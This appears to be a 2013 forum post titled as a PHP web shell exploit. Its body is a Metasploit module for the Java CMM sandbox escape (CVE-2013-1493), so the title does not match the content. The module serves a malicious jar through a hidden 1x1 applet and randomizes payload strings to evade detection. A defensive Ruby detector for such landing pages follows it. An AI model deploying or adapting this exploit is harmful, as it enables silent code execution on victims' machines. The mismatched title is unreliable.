STUNSHELL PHP Web Shell Remote Code Execution

Thread starter, posted 2013-4-4 17:31:17
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::BrowserAutopwn

  autopwn_info({ :javascript => false })

  def initialize( info = {} )
    super( update_info( info,
      'Name'           => 'Java CMM Remote Code Execution',
      'Description'    => %q{
        This module abuses the Color Management classes from a Java Applet to run
        arbitrary Java code outside of the sandbox as exploited in the wild in February
        and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
        and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
        systems. This exploit doesn't bypass click-to-play, so the user must accept the java
        warning in order to run the malicious applet.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown',     # Vulnerability discovery and Exploit
          'juan vazquez' # Metasploit module (just ported the published exploit)
        ],
      'References'     =>
        [
          [ 'CVE', '2013-1493' ],
          [ 'OSVDB', '90737' ],
          [ 'BID', '58238' ],
          [ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
          [ 'URL', 'http://pastie.org/pastes/6581034' ]
        ],
      'Platform'       => [ 'win', 'java' ],
      'Payload'        => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'        =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => 'java',
              'Arch'     => ARCH_JAVA
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch'     => ARCH_X86
            }
          ]
        ],
      'DefaultTarget'  => 1,
      'DisclosureDate' => 'Mar 01 2013'
    ))
  end

  # Load the precompiled applet classes shipped with the framework and
  # randomize the name of the entry class so the served jar differs per run.
  def setup
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Init.class")
    @init_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Leak.class")
    @leak_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyBufferedImage.class")
    @buffered_image_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyColorSpace.class")
    @color_space_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    @init_class_name = rand_text_alpha("Init".length)
    @init_class.gsub!("Init", @init_class_name)

    super
  end

  # Serve the jar on *.jar requests, the applet landing page on the resource
  # root, and redirect everything else to the root.
  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      jar = payload.encoded_jar
      jar.add_file("#{@init_class_name}.class", @init_class)
      jar.add_file("Leak.class", @leak_class)
      jar.add_file("MyBufferedImage.class", @buffered_image_class)
      jar.add_file("MyColorSpace.class", @color_space_class)

      # Rename the well-known strings in the payload entries before building the manifest.
      metasploit_str = rand_text_alpha("metasploit".length)
      payload_str = rand_text_alpha("payload".length)
      jar.entries.each { |entry|
        entry.name.gsub!("metasploit", metasploit_str)
        entry.name.gsub!("Payload", payload_str)
        entry.data = entry.data.gsub("metasploit", metasploit_str)
        entry.data = entry.data.gsub("Payload", payload_str)
      }
      jar.build_manifest

      send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
    when /\/$/
      payload = regenerate_payload(cli)
      if not payload
        print_error("Failed to generate the payload.")
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource() + '/', '')
    end
  end

  # Minimal page embedding a 1x1 applet whose archive name is randomized per request.
  def generate_html
    html  = %Q|<html><head><title>Loading, Please Wait...</title></head>|
    html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
    html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@init_class_name}.class" width="1" height="1">|
    html += %Q|</applet></body></html>|
    return html
  end

end
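As an added defender-side example (not part of the posted module or of Metasploit), the following Ruby flags HTML responses that look like the landing page generate_html serves: a 1x1 applet pulling a random 8-letter .jar and a random 4-letter .class from a bare "Loading, Please Wait" stub. The sample pages and the thresholds are constructed assumptions for illustration.

```ruby
# Added example, not code from the posted module: heuristic detection of the
# applet landing page pattern produced by generate_html above. Sample pages below are constructed.

APPLET_RE = /<applet\b([^>]*)>/i
ATTR_RE   = /(\w+)\s*=\s*"([^"]*)"/

# Parse an applet tag's attribute string into a lowercase-keyed hash.
def applet_attrs(attr_str)
  attr_str.scan(ATTR_RE).each_with_object({}) { |(k, v), h| h[k.downcase] = v }
end

# Collect the reasons one applet element resembles drive-by delivery.
def applet_reasons(a, html)
  reasons = []
  if a.key?('width') && a.key?('height') && a['width'].to_i <= 1 && a['height'].to_i <= 1
    reasons << 'applet rendered at 1x1 or smaller (hidden)'
  end
  # Mirrors rand_text_alpha(8) + ".jar" and rand_text_alpha("Init".length) + ".class" in the module.
  reasons << 'archive is an 8-letter random-looking jar' if a['archive'].to_s.match?(/\A[A-Za-z]{8}\.jar\z/)
  reasons << 'code is a 4-letter random-looking class'  if a['code'].to_s.match?(/\A[A-Za-z]{4}\.class\z/)
  reasons << 'page is a bare "Loading, Please Wait" stub' if html.match?(/<title>Loading, Please Wait/i)
  reasons
end

# Scan a page; returns [{attrs:, reasons:}] for applets with at least two reasons (assumed threshold).
def suspicious_applets(html)
  html.scan(APPLET_RE).flatten.filter_map do |attr_str|
    attrs = applet_attrs(attr_str)
    reasons = applet_reasons(attrs, html)
    { attrs: attrs, reasons: reasons } if reasons.size >= 2
  end
end

# Constructed samples: one shaped like the module's page, one ordinary applet page.
SAMPLE_DRIVEBY = '<html><head><title>Loading, Please Wait...</title></head>' \
  '<body><center><p>Loading, Please Wait...</p></center>' \
  '<applet archive="QwErTyUi.jar" code="XkPa.class" width="1" height="1"></applet></body></html>'
SAMPLE_BENIGN = '<html><head><title>Chess</title></head><body>' \
  '<applet archive="chess.jar" code="com.example.Chess" width="640" height="480"></applet></body></html>'

if __FILE__ == $0
  suspicious_applets(SAMPLE_DRIVEBY).each { |f| puts "ALERT #{f[:attrs]['archive']}: #{f[:reasons].join('; ')}" }
  puts "benign page findings: #{suspicious_applets(SAMPLE_BENIGN).size}"
end
```

Run against captured proxy or web-filter response bodies; the per-reason output is meant for triage, since a single reason (a small applet alone, for instance) is common on legitimate pages.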